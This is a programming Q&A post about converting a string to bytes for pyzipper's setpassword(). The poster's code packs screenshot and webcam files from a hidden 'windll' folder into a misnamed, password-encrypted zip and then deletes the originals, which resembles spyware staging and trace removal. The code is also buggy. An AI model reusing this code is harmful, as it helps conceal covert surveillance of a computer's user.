# How to convert string to binary for setpassword() function in Python

Tags: python, string, binary, zip

This code writes to a string-type password random numbers and symbols. Then create a zip file and write there another zip file and then It needs to set a password to the zip file, but It wants a bin type, not a string to set the password. So I tried a lot of things but every time get the error. Can you help me, please with this problem?

my code

```
import shutil
import os
import random
import pyzipper
def makemeZip(password):
    try:
        user = os.environ['USERPROFILE'].replace("C\\Users\\")
    except:
        dox = "qwertyuiopasdfghjklzxcvbnm1234567890"
        for i in range (30):
            password += dox[random.randint(0,len(dox)-1)]
        path = os.environ['USERPROFILE'] + os.sep + r'AppData\Local'
        shutil.make_archive(fr'{path}\cashe', 'zip', fr'{path}\windll')
        shutil.move(fr'{path}\cashe.zip',"cashe.zip")
        with pyzipper.AESZipFile('The murk results.zip','w',compression=pyzipper.ZIP_STORED,encryption=pyzipper.WZ_AES) as logs:
            print(password)
            logs.setpassword(password)# transform password to binary
            logs.write("cashe.zip")
        os.remove("cashe.zip")
    shutil.rmtree(rf'{path}\windll', ignore_errors=True)
    try:
        os.remove(rf'{path}\windll\sreenshot.jpg')
        os.remove(rf'{path}\windll\webcam.png')
    except:
        pass
    return password
```

Comment: So what do you think you should do in order to convert a string to a binary? Just a simple google search would give you the answer

Comment: use
```
bytearray(password, 'utf-8')
```
got error
```
expect binary got bytearray
```


use
```
format(password, 'b')
```
got error
```
expect binary got string
```


use
```
bin(password)
```
got error
```
expect binary got string
```


use
```
bin(password)
```
got error
```
expect binary got string
```

Comment: like this 
pwd: expected bytes, got str

Comment: this function works through the ass and I don't know how to satisfy it

Comment: ```
   pd = ''.join(format(i, '08b') for i in bytearray(password, encoding ='utf-8'))
   logs.setpassword(pd)# transform password to binary
```

pwd: expected bytes, got str

Comment: pwd = bytes(password, "UTF-8") this is the best

Answer (score 0, accepted):

Only this function works incorrectly and without errors

```
pwd = bytes(password, "UTF-8")
```